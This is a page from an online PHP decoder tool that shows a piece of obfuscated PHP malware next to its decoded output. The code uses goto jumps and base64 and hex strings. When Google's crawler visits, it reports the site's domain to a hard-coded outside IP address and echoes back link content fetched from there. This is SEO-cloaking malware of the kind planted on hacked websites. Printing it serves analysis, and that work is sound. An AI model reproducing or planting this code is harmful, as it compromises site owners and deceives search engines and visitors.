Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php goto nGtCL; SINt9: error_reporting(0); goto ecIkC; nGtCL: ob_implicit_flush(true); g..

Decoded Output download

<?php goto nGtCL; SINt9: error_reporting(0); goto ecIkC; nGtCL: ob_implicit_flush(true); goto JemSn; eNdPp: if (strpos($botbotbotbot, "oogle")) { $xxx = base64_decode("NQ=="); $xxx1 = base64_decode("NjE="); $xxx2 = base64_decode("NTg="); $xxx3 = base64_decode("MTU="); $xxx4 = base64_decode("aW5wdXQ="); $xxx0 = base64_decode("aHR0cDovLw=="); $xxx00 = $xxx . "." . $xxx1 . "." . $xxx2 . "." . $xxx3; $xxx11 = $xxx4 . "/?useragent=" . $botbotbotbot . "&domain=" . $_SERVER["HTTP_HOST"]; $url = $xxx0 . $xxx00 . "/" . $xxx11; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result = curl_exec($ch); curl_close($ch); echo $result; if (strpos($result, "href=") < 1) { $result = file_get_contents("{$url}"); echo $result; } if (strpos($result, "href=") < 1) { $url = $xxx00; $fp = fsockopen($url, 80, $errno, $errstr, 30); if (!$fp) { echo "{$errstr} ({$errno})<br />\xa"; } else { $req = "/" . $xxx11; $out = "GET {$req} HTTP/1.0\xd\xa"; $out .= "Host: {$url}\xd\xa"; $out .= "Connection: Close
\xd
"; fwrite($fp, $out); while (!feof($fp)) { $text = $text . fgets($fp, 2048); } fclose($fp); } fclose($out); $text = explode("\xa", $text); $text = $text[7]; echo $text; } } goto T0CFm; R8KvX: $botbotbotbot = str_replace(" ", "-", $botbotbotbot); goto eNdPp; ecIkC: $botbotbotbot = "..." . $_SERVER["HTTP_USER_AGENT"]; goto R8KvX; JemSn: ob_end_flush(); goto SINt9; T0CFm: ?>

Did this file decode correctly?

Original Code

<?php goto nGtCL; SINt9: error_reporting(0); goto ecIkC; nGtCL: ob_implicit_flush(true); goto JemSn; eNdPp: if (strpos($botbotbotbot, "\157\x6f\x67\154\145")) { $xxx = base64_decode("\116\121\x3d\x3d"); $xxx1 = base64_decode("\116\152\105\x3d"); $xxx2 = base64_decode("\116\124\147\x3d"); $xxx3 = base64_decode("\x4d\x54\x55\75"); $xxx4 = base64_decode("\x61\x57\x35\x77\144\130\121\75"); $xxx0 = base64_decode("\x61\110\x52\60\143\104\157\x76\114\x77\x3d\75"); $xxx00 = $xxx . "\x2e" . $xxx1 . "\56" . $xxx2 . "\x2e" . $xxx3; $xxx11 = $xxx4 . "\x2f\x3f\x75\163\x65\x72\141\147\x65\156\164\75" . $botbotbotbot . "\46\x64\x6f\155\141\x69\x6e\75" . $_SERVER["\x48\124\124\120\137\x48\117\x53\124"]; $url = $xxx0 . $xxx00 . "\x2f" . $xxx11; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result = curl_exec($ch); curl_close($ch); echo $result; if (strpos($result, "\150\x72\x65\146\75") < 1) { $result = file_get_contents("{$url}"); echo $result; } if (strpos($result, "\150\162\x65\146\75") < 1) { $url = $xxx00; $fp = fsockopen($url, 80, $errno, $errstr, 30); if (!$fp) { echo "{$errstr}\x20\50{$errno}\x29\x3c\142\162\x20\57\x3e\xa"; } else { $req = "\57" . $xxx11; $out = "\107\105\x54\40{$req}\x20\x48\124\124\x50\x2f\61\x2e\x30\xd\xa"; $out .= "\110\157\163\x74\x3a\x20{$url}\xd\xa"; $out .= "\103\x6f\156\156\145\x63\x74\151\x6f\156\x3a\40\103\x6c\157\163\x65\15\12\xd\12"; fwrite($fp, $out); while (!feof($fp)) { $text = $text . fgets($fp, 2048); } fclose($fp); } fclose($out); $text = explode("\xa", $text); $text = $text[7]; echo $text; } } goto T0CFm; R8KvX: $botbotbotbot = str_replace("\x20", "\55", $botbotbotbot); goto eNdPp; ecIkC: $botbotbotbot = "\x2e\x2e\56" . $_SERVER["\110\x54\124\x50\137\125\123\x45\x52\x5f\101\x47\105\x4e\124"]; goto R8KvX; JemSn: ob_end_flush(); goto SINt9; T0CFm: ?>

Function Calls

None

Variables

None

Stats

MD5 084808d527992dd7530869f00e937022
Eval Count 0
Decode Time 65 ms